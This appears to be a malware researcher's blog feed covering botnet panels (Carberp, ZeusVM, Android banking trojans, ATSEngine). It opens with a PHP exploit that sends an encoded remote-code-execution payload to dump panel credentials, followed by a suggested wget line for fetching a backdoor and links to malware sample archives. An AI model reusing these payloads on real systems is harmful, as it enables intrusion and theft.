echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>

The 'encoded' part do a file_get_contents() on includes/config.php
Then connect to the SQL db and show the Carberp credentials. (in case if we don't have phpMyAdmin)
But it would be useless if we can't show the login page due to Auth key so it parse index.php and retrieve it.
Cool payload huh ?
Let's test it so...

37.221.165.123:

91.214.202.117:

I've tested on some others C&C and everything went fine.
And it's a RCE so you can execute some cool shit like system('wget http://xxx.xxx');
To download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram' ?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
oh really, who's fucked now ?




ZeusVM and steganography

April 13, 2014, 12:20 pm
$
0
0
Months ago, researchers observed an evolution of ZeusVM, time to get back on this family.

For informations,
The first ZeusVM sample i've seen using steganography was the 21 November 2013.
The IP of the C&C have Russian origin: 212.44.64.202
A Sutra TDS who redirect on Nuclear Exploit pack was pushing the payload, Roman of abuse.ch blacklisted 212.44.64.202 one month later on his Zeus tracker.

The first guy who publicly wrote about ZeusVM change is probably Jerome Segura of Malwarebytes.
Actually the latest version i've saw in the wild is 1.0.0.5, and if you want a hash: e4c31d18b92ad6e19cb67be2e38c3bd1 (sample is fresh of today)

Let's have a look on the first server that i've see now... 212.44.64.202.
Pony, Multilocker, Mailers, Grum and an older version of ZeusVM (without steganography) was also hosted on this server but that not the topic.

The filename of login scripts and ZeusVM configs were hardnamed in russian, like:
borodinskoesrajenie.jpg (http://en.wikipedia.org/wiki/Battle_of_Borodino)
vhodtolkodlyaelfov.php (only elves can enter)
logovoelfov.php (elf's den)
domawniypitomec.php (domestic animal)
jivotnoe.php (animal)
larecotkryt.php (the chest is open)
And so on.. overall the panel design seem back to the original zeus style (not like the previous 'generation' of ZeusVM with casper)

/kec/:

/luck/:

/ass/:

/kbot/:

/ksks/:

/one/:

/two/ (unused):
/

/three/ (unused):

/four/ (unused):

Now, for decoding those ZeusVM images, as described by Jerome, you just need to strip the image and do the following: Base64+RC4+VisualDecrypt+UCL Decompress

Here are some 'malicious' image from 212.44.64.202:
mix.jpg:
mix.jpg:
mix.jpg:
mix.jpg:
config.jpg:
kartamestnosti.jpg:
webi_test.jpg:
uwliottrekera.jpg:
 test_vnc2.jpg:
x64hook.jpg:

Some configs was done for tests:

And some wasn't for test, targeting banks with MiTB.
Malicious code injection, on a ZeusVM botnet targeting France:

Lame webinject:


CCGRAB:
ATSEngine:

Nowadays more actors start to use ZeusVM, like the group who was using the 'private' version of Citadel 3.1.0.0 and the group who was targeting Japan.
Both switched on ZeusVM as alternative of Citadel.

You can find the samples related to 212.44.64.202 with config and decoded here:
http://temari.fr/vx/ZeusVMs_212.44.64.202.7z

Some other ZeusVM samples (not related to 212.44.64.202):
http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z





root/root

Android/FakeToken.A

April 20, 2014, 4:07 am
$
0
0
OTP forwarder dumped months ago.

Login:

Statistics:

Bots:

Bot:

Passwords:

Send a command:

Commands sent:

Apps:

Apps builder:

MD5s:
2d4770137ae0b91446fc2f99d9fdb2b0
f629adcfbcdd4622ad75337ec0b1a0ff
dd4ac55df6500352dd2cad340a36a40f
b9f9614775a54aa42f94eedbc4796446
1fababfd02ea09ae924cd0a7dbfb708c
bc8394bc9c6adbcfca3d450ee4ede44a
1cb87e1716c503bf499e529ee90e5b31
6db5cdd2648fcd445481cdfa2f2b065a
2ad6f8b8e4aaf88b024e1ddb99833b79
8bac185b6aff0bec4686b7f4cb1659c8

App settings:

Settings:

Second panel, a bit different, look like a 'test' one.
Statistics:

Phone:

Phone search:

Settings:

RSA Security talked also about it here

Lame scareware

April 27, 2014, 12:09 pm
$
0
0
I've found a sample yesterday downloaded via this url: skyways.co/play.exe, console application, and ugly code + scareware and third party FakeAV call center.
All the following was so lame that i need to talk about this.


 At first the malware will try to see if he's dropped into %SYSTEMROOT%/system/
If it's not the case then he will create a file:

Then, you think he will write into the new file created but nope, he add a registry persistence, by using the api CreateProcess (oh god, why) instead of using RegCreateKey:

Wrote finally the file:

Wait 5 minutes then display a message box:
"Your computer's file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162"

After a reboot, a shutdown procedure is initialized:


And 5 minutes after, once again the messagebox:


I searched the phone number on google and found this:
"Technicion is an independent provider of on-demand tech support and not affiliated with any third party"

ok, what's about the payement page:
Just 99.99 without any explanation, even the currency symbol is unknown, what a serious site.

And for the story i tried to call 1-866-286-6162 to insult them and tell them how much i hate their ugly code etc.. but there was no available representatives..
Search

Android.Trojan.Rubobi.A (SmsPiratBot)

April 27, 2014, 1:36 pm
$
0
0
Another Android botnet dumped recently.
This malware can send and intercept sms from bots.
Like most of android botnets, they are used mainly to target mobile banks like Sberbank (www.sberbank.ru - the biggest bank in Russia)
In Russia, you can transfer money from one card to another card through mobile sms
This botnet is sold 120$

Fake App:
MD5: 2ea5e73653d1454c04ecd48202dcc391

Login:

System Stats:

Countries:

Operators:

Task Stats:

Task Editor:

Blacklist:

Stored SMS:

Another panel:

Structure:

ATSEngine

May 3, 2014, 4:12 pm
$
0
0
ATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots.
It's the main difference with this, and a standard web inject inside Zeus.
One just allows you to do a static change in the page while the other gives you much more options, for example, customized webinjects, pop-ups, online requests for token etc...
ATSEngine have also a jabber alert feature, it let the fraudster know when the victim is logged to his bank account so it would be a god time to backconnect him (with the VNC feature of Zeus) and do the transaction.
Most of ATSEngine panels are also hosted on SSL because banks use SSL.

ATSEngine on a ZeusVM config.

ATSEngine on a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some guys do also a business with this type of web injects, for example:
He's offering a service for writing injects.
The title says "Auto-uploads and Injects from professionals for professionals"
The rest of the text explains how the service works, it's more a terms and conditions post rather than a technical description of the product, about moneyback, privacy, guarantees and other stuff.
They dont write mobile botnets, trojan horses, traffic direction systems or other malware software except injects, also they dont guarantee bypass of protection (like Rapport).
yummba is know anyway for writing injects for ATSEngine.

Let's have a look on a C&C now..


Accounts:

Reports:

Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:

Details:

Additional fields rules:

Additionnal fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:

Options:

Options (CC Checker):

Files, dumped from another panel, targeting La banque Postal (a French bank):

Install service for Malware affiliates and individuals

May 5, 2014, 4:16 am
$
0
0
This install service was running since a long time but the server recently died.
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.

Login:

Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

Downloads:
(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

Updates:
(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There is some interesting people in this listing:
Severa (Know for FakeAV, Spam)
Malwox Affiliate (Mayachok.1)
Feodal cash Affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)
The x64 Zbot covered by Kaspersky also come from here.

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1363&start=50#p19625
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=648&start=40#p19621
The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

FTP:
Menu: users list, add, FTP, Stats.

For the FTP list, most of accounts were with shell on them.

Structure:

From the source:
$useZorkaJob=0;//схч чрїюфр
$useSputnikJob=0;
$useRekloJob=0;
$useSpoiskJob=0;
$useBegunCheatJob=0;
Begun is one of the biggest ads services in Russia.

i/o

December 20, 2014, 9:45 am
$
0
0
Wow, it's been a awhile since i haven't written anything new here...
So to answer many questions.. no i'm not dead, and will try to get active again a bit next year.

I'm not writing this due to explanation requests or people worried (even if i got solicited many time to write something) but more because i'm motivated again to write.
As i've said many times to the recurrent e-mails i receive and continue to receive (even after 7 months of inactivity!)
I've did a lot of changement in my life, and during this time i got better things to do than writing in a blog.
Principaly i had many personal issues to resolve.
It's also not the first time i repeat that i've a life and that i've always run this blog for fun and nonprofit like my other services such as cybercrime-tracker.net
And sooner or later i will get bored and do a break although i've continued to update CCT, to don't leave people with nothing.


I changed of job also and shifted in the energy sector.
I wanted to get a job who combine my passion for mechanic and electronic.
And now i'm winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)
I can't tell you details obviously due to confidentiality clauses as it's critical, but making those huge machines/projects are quite awesome and the job is very meticulous.

I've joined also the administration of my local hackerspace, and now holds the position of treasurer.
I'm doing also various workshops mostly electronic/borderline related who take me time to prepare and organize.
In parallel i experiment myself also a lot, those who follow my youtube/twitter activity probably know what i mean, i received 2 day ago hydrofluoric acid.

2014 started a bit bad for me as i had a car crash the day of christmas and got the clavicle broken. Anyway globally it was a nice year, and off my blog i've met a lot of people like Horgh and many others.
Sadly i wasn't able to go to BotConf neither DahuCon this year due to my job... so maybe next year !

I've worked a bit also with Hackerstrip and released recently some codes for DarK-CodeZ #6, nothing fancy but it was fun to participate, thanks guys.
So that all, see you in 2015 for throwing cobblestones and breaking bones !

iBanking

January 12, 2015, 12:47 pm
$
0
0
iBanking is an android malware made to intercept voice and text informations.
The panel is poorly coded.

Login:

Projects:

Phone list:

SMS List:

All SMS (Incomming)

All SMS (Outgoing):

Call list (Incomming):

Call list (Outgoing):

Call list (Missed):

Sounds:

Contact list:

Url report:
Viewing all 128 articles
Browse latest View live
Search